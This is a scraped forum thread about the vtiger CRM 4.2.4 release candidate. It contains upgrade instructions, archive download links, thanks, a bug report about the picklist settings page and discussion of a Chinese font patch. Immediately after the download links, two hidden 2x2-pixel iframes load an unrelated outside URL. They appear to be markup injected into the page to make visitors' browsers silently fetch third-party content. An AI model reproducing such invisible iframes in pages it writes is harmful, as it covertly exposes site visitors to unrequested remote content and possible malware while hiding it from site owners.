Hi everyone,
The 4.2.4 release is almost ready, it just needs a bit of testing. The changes can be viewed in the Subversion revision log.
<!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/cgi-bin/trac.cgi/log/vtigercrm/branches/4.2?rev=3935&stop_rev=3603&verbose=on">http://vtiger.fosslabs.com/cgi-bin/trac ... verbose=on</a><!-- m -->
Right now the only database changes between 4.2.3 and 4.2.4 are a few additional indexes to allow several Foreign Keys to insert properly during installation. This will help fix the "partial tables" problem during install.
If you are upgrading, then remove all files from your vtiger install except for config.php and replace it with the files from the new release.
There are three archive formats available: tar.bz2(7.6MB), tar.gz(8.5MB) and zip(11MB)
As with any update, make sure you backup your database before trying this or any update.
<!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/releases/4.2/vtigercrm-4.2.4rc1.tar.bz2">http://vtiger.fosslabs.com/releases/4.2 ... c1.tar.bz2</a><!-- m -->
<!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/releases/4.2/vtigercrm-4.2.4rc1.tar.gz">http://vtiger.fosslabs.com/releases/4.2 ... rc1.tar.gz</a><!-- m -->
<!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/releases/4.2/vtigercrm-4.2.4rc1.zip">http://vtiger.fosslabs.com/releases/4.2 ... 2.4rc1.zip</a><!-- m --> <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
Comments
<!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/cgi-bin/trac.cgi/ticket/37">http://vtiger.fosslabs.com/cgi-bin/trac.cgi/ticket/37</a><!-- m -->
mfedyk
jeffk
allanbush
fathi
mmbrich
and anyone else that i've missed.
this is awesome...thanks!!
brian
can you give a quick description on how to reproduce the problem this fixes?
thanks
thanks for the patch.
attchments can now be added by anonymous users in the trac ticket system now.
settings => picklist settings => anyone below
error message:
call to a member function on a non-object in /modules/settings/combofieldlist.php on line 223
example url:
index.php?module=settings&action=combofieldlist&fld_module=vendor
<!-- s:) --><img src="{smilies_path}/icon_smile.gif" alt=":)" title="smile" /><!-- s:) -->
<!-- m --><a class="postlink" href="http://twpug.net/modules/wfdownloads/singlefile.php?cid=36&lid=616">http://twpug.net/modules/wfdownloads/si ... 36&lid=616</a><!-- m -->
this version included a free font for traditional chinese and modified some settings for jpgraph to prevent character errors in the charts. it's not great to download it if you don't use this language. ^^
hi kiang,
here is your patch with my comments: you change the definition of ff_chinese below and then remove warning.
can you add a difinition for utf8 fonts instead of modifying an entry meant for big5 encoded fonts? what happened to 'tw_zh' here?
about the second problem. 'tw_zh' is no longer exists(and i have no idea why it's there). i used 'zh-tw' because most browser accept it by default.
i'll make a patch for first problem latter with the ticket. <!-- s:) --><img src="{smilies_path}/icon_smile.gif" alt=":)" title="smile" /><!-- s:) -->